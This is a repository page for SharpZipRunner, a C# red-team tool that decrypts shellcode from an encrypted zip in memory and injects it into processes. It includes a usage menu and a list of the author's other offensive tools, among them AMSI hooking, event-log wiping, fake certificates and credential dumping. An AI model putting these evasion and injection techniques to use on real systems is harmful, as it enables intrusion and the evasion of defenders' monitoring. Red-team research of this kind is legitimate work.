• Stars
    star
    300
  • Rank 138,870 (Top 3 %)
  • Language
    C#
  • License
    GNU General Publi...
  • Created almost 4 years ago
  • Updated almost 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Executes position independent shellcode from an encrypted zip

SharpZipRunner

Executes position independent shellcode from an encrypted zip Get PIC code from your assembly either by using donut or metasploit or cobaltstrike RAW format.

zip the .bin file and encrypt it with a password, this assembly decrypts the zip entry in memory and executes it using D/Invokes injection API.

capable of injecting in a running process, or by creating a new process first and injecting into the newly created process. injection in itself should theoritically be possible, but causes crashes. as injecting into yourself is not really what I wanted to achieve here, did not really try to fix that issue.

tested by dropping the encrypted zip on disk, but could probably also work entirely in memory with some modifications. only supports PIC payloads, tried creating a runPE variant but failed miserably :)

 ___  _                   ____ _       ___
/ __>| |_  ___  _ _  ___ |_  /<_> ___ | . \ _ _ ._ _ ._ _  ___  _ _
\__ \| . |<_> || '_>| . \ / / | || . \|   /| | || ' || ' |/ ._>| '_>
<___/|_|_|<___||_|  |  _//___||_||  _/|_\_\`___||_|_||_|_|\___.|_|
                    |_|          |_|


An Encrypted zip on your computer? what could possibly go wrong?

 Usage:
  -z, --zip-file=VALUE       The path on disk to the encrypted zip

  -e, --entry=VALUE          The specific zip entry to put in mem (optional),
                               if not provided assumes only one zip entry is
                               present

  -p, --password=VALUE       The password of the encrypted zip

  -i, --process=VALUE        The process to inject into (if not used will
                               inject into self (not recommended)

  -c, --create               Create a new process, and injects into that
                               process (requires the process argument)

  -h, --help                 shows this menu

More Repositories

1

LazySign

Create fake certs for binaries using windows binaries and the power of bat files
PowerShell
543
star
2

Invoke-DLLClone

Koppeling x Metatwin x LazySign
PowerShell
201
star
3

SharpHandler

C#
181
star
4

AmsiHooker

Hookers are cooler than patches.
C#
167
star
5

GG-AESY

Hide cool stuff in images :)
C#
144
star
6

TrustJack

Yet another PoC for https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
C#
142
star
7

SharpNukeEventLog

nuke that event log using some epic dinvoke fu
C#
114
star
8

SharpLNKGen-UI

UI for creating LNKs
C#
96
star
9

SharpRDPDump

Create a minidump of TermService for clear text pw extraction
C#
87
star
10

Backdoorplz

adding a backdooruser using win32api
C++
79
star
11

Red-EC2

Spin up RedTeam infrastructure on AWS via Ansible
59
star
12

DeepSleep

all credits go to @mgeeky
C
58
star
13

CSharpReflectionWorkshop

The repository that complements the From zero to hero: creating a reflective loader in C# workshop
C#
37
star
14

Clippi-B

C#
34
star
15

FunWithServerless

Python
23
star
16

Emulation-Workshop

The repository accompanying the Buer Emulation workshop
C#
23
star
17

Ansible-EmpireSuite

ansible roles to download and install empire (BC-Security),deathstar(byt3bl33der) and starkiller (BC-Security)
23
star
18

CMDLL

the most basic DLL ever to pop a cmd.
C++
22
star
19

Red-Route53-Interactive

17
star
20

talks-cons

aggregated repo for all conferences and talks I am giving
C#
17
star
21

Ansible-Cobalt-Strike

An Ansible role to install cobalt-strike
16
star
22

SharpXOR

XOR crypt/decrypt using C#
C#
12
star
23

blogposts-talks-and-tidbits

all random stuff that dont warrant a seperate repo
C
12
star
24

Parsers

parsers to make life easier
Python
12
star
25

DRegHide

fun stuff with null bytes and dinvoke
C#
8
star
26

sharpbysentinel

lol firewall
C#
7
star
27

impacket-nomulti-adcs-shadowcreds

in case clients are annoying with enforcing signing :)
Python
7
star
28

SEC565-Tools

PowerShell
5
star
29

NerveGas

messing around with ETW in C#
C#
4
star
30

x33fcon-workshop

PowerShell
3
star
31

RegFetch

Interfaces with winsockets to fetch a txt file, parses the file and changes the registry accordingly
C++
2
star
32

BeFree

get rid of pesky registry restrictions.
PowerShell
2
star
33

Get-ServiceACL

courtesey of a gist I found on github
PowerShell
1
star